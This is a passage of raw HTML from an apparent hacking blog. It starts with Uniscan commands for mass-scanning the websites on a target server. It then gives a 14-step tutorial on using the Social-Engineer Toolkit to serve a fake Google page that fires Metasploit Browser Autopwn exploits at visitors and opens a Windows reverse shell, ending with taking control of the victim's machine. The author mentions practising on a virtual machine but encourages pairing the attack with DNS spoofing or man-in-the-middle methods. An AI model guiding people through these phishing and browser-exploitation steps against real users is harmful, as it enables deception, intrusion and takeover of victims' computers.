./uniscan.pl -i "ip:127.0.0.1"</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
Change 127.0.0.1 to your target server. All the websites will be stored in "sites.txt" in the same directory.</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
Now to scan those sites in the list, run this command:</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: lime; font-family: Verdana, sans-serif;">
./uniscan.pl -f sites.txt -bqwd</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
You can change the options to whatever you want.</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com5tag:blogger.com,1999:blog-5858162330672279498.post-67268669277256645502013-07-26T12:43:00.000-04:002013-07-26T12:43:57.298-04:00Hacking windows using SET<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #e06666; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">GAINING WINDOWS USING SET</span></div>
<div class="post-body entry-content" style="background-color: transparent; line-height: 20px; margin: 0px; padding: 0px 10px 0px 0px;">
<div style="color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 12px;">
<br /></div>
<div class="separator" style="clear: both; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: center;">
</div>
<div class="separator" style="clear: both; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: center;">
</div>
<div style="color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 12px;">
<br /></div>
<div class="separator" style="clear: both; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWWr-oBT6AE-HBGqR7WugvS0MK2w2ibtRyG9vGw__HMOjpbNCkGsEXGSD-KyH-dFVhAa8MFG1xIhQsjwZBWvRu264vzZUaFD76NDIJRmUDCiufWYHF8LGvjRQazRvHRMerXlhCqbICHNx/s1600/11.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #351c75;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWWr-oBT6AE-HBGqR7WugvS0MK2w2ibtRyG9vGw__HMOjpbNCkGsEXGSD-KyH-dFVhAa8MFG1xIhQsjwZBWvRu264vzZUaFD76NDIJRmUDCiufWYHF8LGvjRQazRvHRMerXlhCqbICHNx/s400/11.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div class="separator" style="clear: both; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: center;">
</div>
<div class="separator" style="clear: both; color: #555555; font-family: Arial, Verdana; font-size: 12px; text-align: center;">
<b><span class="Apple-style-span" style="color: #351c75;"><br /></span></b></div>
<span style="font-family: Verdana, sans-serif;"><span class="Apple-style-span"><span class="Apple-style-span" style="color: #b4a7d6;"><b>What is Social Engineering Toolkit ?</b></span></span><span class="Apple-style-span" style="color: #351c75;"><br /></span><span style="color: #f3f3f3;"><span class="Apple-style-span">The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the<a href="http://www.social-engineer.org/" style="border: none; outline: none; text-decoration: none;"> http://www.social-engineer.org</a> launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.</span><span class="Apple-style-span"><br /></span><span class="Apple-style-span"><br /></span><span class="Apple-style-span">Actually this hacking method will works perfectly with DNS spoofing or Man in the Middle Attack method. Here in this tutorial I’m only write how-to and step-by-step to perform the basic attack, but for the rest you can modified it with your own imagination. </span><span class="Apple-style-span"><br /></span></span><span class="Apple-style-span" style="color: #351c75;"><br /></span><span class="Apple-style-span" style="color: #351c75;"><br /></span><span class="Apple-style-span" style="color: #ffd966;"><b>Requirement : </b></span><span class="Apple-style-span" style="color: #351c75;"><br /></span><span class="Apple-style-span" style="color: #555555;"><b><span class="Apple-style-span" style="color: #674ea7;">1. Backtrack 5 or Backtrack 4</span></b></span><span class="Apple-style-span" style="color: #351c75;"><br /></span><span class="Apple-style-span" style="color: #351c75;"><b><br /></b></span><span class="Apple-style-span" style="color: #351c75;"><br /></span><span class="Apple-style-span" style="color: #ffd966;"><b>Step By Step : </b></span><span class="Apple-style-span" style="color: #351c75;"><br /></span><span class="Apple-style-span" style="color: #f3f3f3;"><b>1</b>. Change your work directory into /pentest/exploits/set/ </span><span class="Apple-style-span" style="color: #351c75;"><br /></span></span><br />
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0qZtGrQ2NJ668Oo5AxYHEWMVu46IWULX6MLPZhyphenhyphenwoxYVtPNiIJ-L1UVfdAaQWcTHLm_2E1vI3p7G4R66kV1Y1WCFGXamFvvAbJIT1UqQPLqpM5VYNVJT95A94sjt-xCmgKq8HTJwWa_1H/s1600/12.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0qZtGrQ2NJ668Oo5AxYHEWMVu46IWULX6MLPZhyphenhyphenwoxYVtPNiIJ-L1UVfdAaQWcTHLm_2E1vI3p7G4R66kV1Y1WCFGXamFvvAbJIT1UqQPLqpM5VYNVJT95A94sjt-xCmgKq8HTJwWa_1H/s400/12.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /><br /><span style="color: #f3f3f3;"><b>2.</b> Open Social Engineering Toolkit (SET) ./set and then choose "Website Attack Vectors" because we will attack victim via internet browser. Also in this attack we will attack via website generated by Social Engineering Toolkit to open by victim, so choose "Website Attack Vectors" for this options. </span></span><br />
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<span class="Apple-style-span" style="border: none; color: #351c75; font-family: Verdana, sans-serif; margin-left: 1em; margin-right: 1em; outline: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigdxZcQrODKKPmo3KoLhwX9jqJb7s-UfacV8SBdfl18WXOleRWUsh22PVrmKeoUeLTdtwhN0gJ25uRxOqoK9osF-SpfR9teZQwYlwAiNTq9eBt_D8hzSD5HKzuxhO2_0M51BLCVylbHor6/s1600/13.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigdxZcQrODKKPmo3KoLhwX9jqJb7s-UfacV8SBdfl18WXOleRWUsh22PVrmKeoUeLTdtwhN0gJ25uRxOqoK9osF-SpfR9teZQwYlwAiNTq9eBt_D8hzSD5HKzuxhO2_0M51BLCVylbHor6/s400/13.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="280" /></a></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /><br /><span style="color: #f3f3f3;"><b>3</b>. Usually when user open a website, sometimes they don't think that they are opening suspicious website that including malicious script to harm their computer. In this option we will choose "The Metasploit Browser Exploit Method" because we will attack via victim browser. </span></span><br />
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQwvZYgcqsKh0AtfxTlDoylgbNWDzFaAeU7iXi0xSxnMavx-acXI_tLw7Y4BUx-hylPMT9WHCantl3bsEMsmzfqx7vPsORLh_ID3r-y2plRHKPpDFztuIg-e8Zq19j4nX3CX5hXUfHnir8/s1600/14.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQwvZYgcqsKh0AtfxTlDoylgbNWDzFaAeU7iXi0xSxnMavx-acXI_tLw7Y4BUx-hylPMT9WHCantl3bsEMsmzfqx7vPsORLh_ID3r-y2plRHKPpDFztuIg-e8Zq19j4nX3CX5hXUfHnir8/s400/14.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /><br /><span style="color: #f3f3f3;"><b>4</b>. The next step just choose "Web Templates", because we will use the most famous website around the world that already provided by this Social Engineering Toolkit tools. </span></span><br />
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPHdpnyFCUDxQfj3TWuAYoXAJeQBa3DyRNOA9rKDNJtlo8GDlvcBTt5SDRkWW102CZvp13R36mePdXo-vX6AYRjt4SvBenZHHfUqCtNRZSj7Y68ZOEoHVcEeRF3h5oRqkyL2u815cd5rky/s1600/15.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPHdpnyFCUDxQfj3TWuAYoXAJeQBa3DyRNOA9rKDNJtlo8GDlvcBTt5SDRkWW102CZvp13R36mePdXo-vX6AYRjt4SvBenZHHfUqCtNRZSj7Y68ZOEoHVcEeRF3h5oRqkyL2u815cd5rky/s400/15.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /><br /><span style="color: #f3f3f3;"><b>5</b>. There are 4 website templates Ready To Use for this attack methods, such as GMail, Google, Facebook, and Twitter. In this tutorial I will use Google, but if you think Facebook or Twitter more better because it's the most accessed website, just change into what do you want. </span></span><br />
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaej1-6qW03h1kd-zzWMd-KR7uF0A3_hck2nOQfPfN1rfYAwak6RlrFRC0KuUM9gES5EEb1yYYIMikaF2onAWOnZcO9RCYG7Fz63DSR5xxNLkZKiHgeMTsKLYkp1MCMf3M761j2U7t20E8/s1600/16.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaej1-6qW03h1kd-zzWMd-KR7uF0A3_hck2nOQfPfN1rfYAwak6RlrFRC0KuUM9gES5EEb1yYYIMikaF2onAWOnZcO9RCYG7Fz63DSR5xxNLkZKiHgeMTsKLYkp1MCMf3M761j2U7t20E8/s400/16.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /><span style="color: #f3f3f3;"><br /><b>6.</b> For the next step…because we didn't know what kind of vulnerability that successfully attack the victim and what type of browser, etc, in this option we just choose "Metasploit Browser Autopwn" to load all vulnerability Social Engineering Toolkit known. This tools will launch all exploit in Social Engineering Toolkit database.<br /></span></span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1ihq-Ty6lfmqkiD4CCY1T8PIsVlr4AgLto_tywDoNwG_s8ie-YOVRR8Mse3FD-YSC0YVx2vn-SJuCO6F69hDQoUYJxwWu7D6y3yIawNnZeO5k6A_ULRe59qORym09qX7voAI3H9oqKBBz/s1600/17.jpg" imageanchor="1" style="border: none; clear: left; color: #085590; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-align: -webkit-auto;"><br /></a></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1ihq-Ty6lfmqkiD4CCY1T8PIsVlr4AgLto_tywDoNwG_s8ie-YOVRR8Mse3FD-YSC0YVx2vn-SJuCO6F69hDQoUYJxwWu7D6y3yIawNnZeO5k6A_ULRe59qORym09qX7voAI3H9oqKBBz/s1600/17.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none; text-align: -webkit-auto;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1ihq-Ty6lfmqkiD4CCY1T8PIsVlr4AgLto_tywDoNwG_s8ie-YOVRR8Mse3FD-YSC0YVx2vn-SJuCO6F69hDQoUYJxwWu7D6y3yIawNnZeO5k6A_ULRe59qORym09qX7voAI3H9oqKBBz/s400/17.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></a></span></div>
<div style="text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><b>7.</b> For payload options selection I prefer the most use Windows Shell Reverse_TCP, but you also can choose the other payload that most comfortable for you</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;">. <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL9gsPLhl8rvCQsns_o95_9ScQ2ih93tQC2GLBerLy9exlpzs4hdjwCT9ifAxBwgYRwmgb5lFsu9gxNL9yIr1y9gJ06VQslelwJSejqWtDsJOpjO6tLUkQa7xyazSs5H6LAD0tmY7KjlTj/s1600/xxxx.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL9gsPLhl8rvCQsns_o95_9ScQ2ih93tQC2GLBerLy9exlpzs4hdjwCT9ifAxBwgYRwmgb5lFsu9gxNL9yIr1y9gJ06VQslelwJSejqWtDsJOpjO6tLUkQa7xyazSs5H6LAD0tmY7KjlTj/s400/xxxx.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /><b>8.</b> The next step is set up the Connect back port to attacker computer. In this example I use port 4444, but you can change to 1234, 4321, etc </span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQXmBMMl_XshW_ZGosZatlDHo1eTn8lmNHe_I-6O_Wz1B-evC0Mls0Z9gqJIUZ8mP5AfsvW8JIv-8Z90CzTEo-n5i8et0Kk_imL-4D884ZK09ydZvdPfbXv2mqzBtG4oLQ2wHQUZzglJG1/s1600/18.jpg" imageanchor="1" style="border: none; clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="clear: left; color: #f3f3f3; float: left; font-family: Verdana, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="13" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQXmBMMl_XshW_ZGosZatlDHo1eTn8lmNHe_I-6O_Wz1B-evC0Mls0Z9gqJIUZ8mP5AfsvW8JIv-8Z90CzTEo-n5i8et0Kk_imL-4D884ZK09ydZvdPfbXv2mqzBtG4oLQ2wHQUZzglJG1/s400/18.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a><span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><b>9</b>. The next step just wait until all process completed and also wait until the server running. </span><br />
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQZvOXiiXHEh1iVbM54FwjLDBd8bHxkntE6EEkloNa_r2W_OmihPg_EwUqQn0WDe9k55L8p0FJCMSwVsHyKKhoI-QUyhpK0j2Jvh5RnIz_zx5TSuokPkBz6hV3HrKWX7yPDYL5NX_l9lOw/s1600/19.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQZvOXiiXHEh1iVbM54FwjLDBd8bHxkntE6EEkloNa_r2W_OmihPg_EwUqQn0WDe9k55L8p0FJCMSwVsHyKKhoI-QUyhpK0j2Jvh5RnIz_zx5TSuokPkBz6hV3HrKWX7yPDYL5NX_l9lOw/s400/19.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbEWKdYR-wGEUQsLg5s7WRNQaciQ-zLe0z6w6EJUNxiDH75_l2NYPaJ81uBv7cgco5HjU1WjAxm4x2fhchNw3Gk4ybsXwwQce3bVb8bGbLzxeWK4IGBQFpMJ8bwSk7By5SxD8mtMNF2j7t/s1600/20.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbEWKdYR-wGEUQsLg5s7WRNQaciQ-zLe0z6w6EJUNxiDH75_l2NYPaJ81uBv7cgco5HjU1WjAxm4x2fhchNw3Gk4ybsXwwQce3bVb8bGbLzxeWK4IGBQFpMJ8bwSk7By5SxD8mtMNF2j7t/s400/20.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-7kMj4m1-vk8/Tg2-FhE2-tI/AAAAAAAAAfs/Mg0yubQ2WzY/s1600/10.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"></a></span></div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /><br /><b>10.</b> When the link given to user, the victim will see looks-a-like Google (fake website). When the page loads it also load all malicious script to attack victim computer.<br /></span><br />
<div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="border: none; color: #f3f3f3; font-family: Verdana, sans-serif; margin-left: 1em; margin-right: 1em; outline: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWYUgN-WxyHK7D4KxqjQRpWpD1oQ359nRAPj_chpz8rmyaUhmjUfUb7fyVRAxQ2ZbO5hriywwPKV2kTJKWWqjW7iyekevksK-RGxMRkmY7MVXpGccUgcF6pNCbmxZs5wdDBm_4e6MEQu_L/s1600/21.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWYUgN-WxyHK7D4KxqjQRpWpD1oQ359nRAPj_chpz8rmyaUhmjUfUb7fyVRAxQ2ZbO5hriywwPKV2kTJKWWqjW7iyekevksK-RGxMRkmY7MVXpGccUgcF6pNCbmxZs5wdDBm_4e6MEQu_L/s400/21.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><br /><b>11</b>. In attacker computer if there's any vulnerability in victim computer browser it will return sessions value that mean the exploit successfully attacking victim computer. In this case the exploit create new fake process named "Notepad.exe". </span></span><br />
<div style="color: #555555;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div style="color: #555555;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBFhrJVidDAlITp9SWkWWlmR0S6p2wdJe_PQQapFBVrfchW4xjS-elpQO66-PZoN-_dGPKSFr7lx6Q5wLtjEMdnCNEjOhxyO2B5I7PyrqSKNc287Jz1GapKB2kb2uMj5fHsk5_daVgQscg/s1600/22.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBFhrJVidDAlITp9SWkWWlmR0S6p2wdJe_PQQapFBVrfchW4xjS-elpQO66-PZoN-_dGPKSFr7lx6Q5wLtjEMdnCNEjOhxyO2B5I7PyrqSKNc287Jz1GapKB2kb2uMj5fHsk5_daVgQscg/s400/22.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div style="color: #555555;">
<br /></div>
<div style="color: #555555;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQRTJY1pneCdkWmqj5ayWLv5kSF9GZ9wDvQIZ6QErsVkWUp6EWTSmoahuf2vXB3TkTVUvPrjUiVrSI7nuz0FSLFK2pw61WZ3Yrt6c8VbUFVSH5KOLMvsup4kiReX8KrPYNMk9sebGi9STy/s1600/23.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQRTJY1pneCdkWmqj5ayWLv5kSF9GZ9wDvQIZ6QErsVkWUp6EWTSmoahuf2vXB3TkTVUvPrjUiVrSI7nuz0FSLFK2pw61WZ3Yrt6c8VbUFVSH5KOLMvsup4kiReX8KrPYNMk9sebGi9STy/s400/23.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div style="color: #555555;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both; color: #555555; text-align: center;">
<span class="Apple-style-span" style="color: #351c75; font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-6HB66sygoBY/Tg2-QOKPIfI/AAAAAAAAAf4/HcqPR8TcdJU/s1600/13.jpg" imageanchor="1" style="border: none; color: #085590; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"></a></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /><span style="color: #f3f3f3;"><br /><b>12.</b> To view active sessions that already opened by the exploit type "sessions -l" for listing an active sessions. Take a look to the ID…we will use that ID to connect to victim computer.<br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8op06UobvoQPwVtTZsZRev81wlaFfniccBK37PJkCRVxtA5hMBQz6JfEMrZobBZkWt8QFTw-QmcsMiE02qsOQFsMbbrWrr6vS_m5Y_vTxSXtS7vHzgd4KZ53mtQd-EXoOiz_iS2Exx7r8/s1600/24.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8op06UobvoQPwVtTZsZRev81wlaFfniccBK37PJkCRVxtA5hMBQz6JfEMrZobBZkWt8QFTw-QmcsMiE02qsOQFsMbbrWrr6vS_m5Y_vTxSXtS7vHzgd4KZ53mtQd-EXoOiz_iS2Exx7r8/s400/24.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><b>13.</b> To interract and connect to victim computer use command "sessions -i ID". ID is numerical value that given when you do sessions -l. For example you can see example in picture below. </span><br />
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-ScezVgY9kBY/Tg2-Zc3wE3I/AAAAAAAAAgA/a_cu-H-tdWI/s1600/15.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"></a></span></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK0NoHFHOSPMi9_cgEsBDo0RESzgyzK8H_wfnrfz0rwycIAWNymT6yl5mTz3NN0_enax3jpvlsk25XZeUU0wChKVZ9cqkIPC-JWXuzEdF1v08F55X-2W8CYYxakP8qZ2UosmCqWyuBdpJk/s1600/25.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK0NoHFHOSPMi9_cgEsBDo0RESzgyzK8H_wfnrfz0rwycIAWNymT6yl5mTz3NN0_enax3jpvlsk25XZeUU0wChKVZ9cqkIPC-JWXuzEdF1v08F55X-2W8CYYxakP8qZ2UosmCqWyuBdpJk/s400/25.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><b>14</b>. Victim computer already owned. I'm practice to create this tutorial using Virtual Machine so it will not harm other computer and also you can doing a lot of experience with your OS.</span></div>
<div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
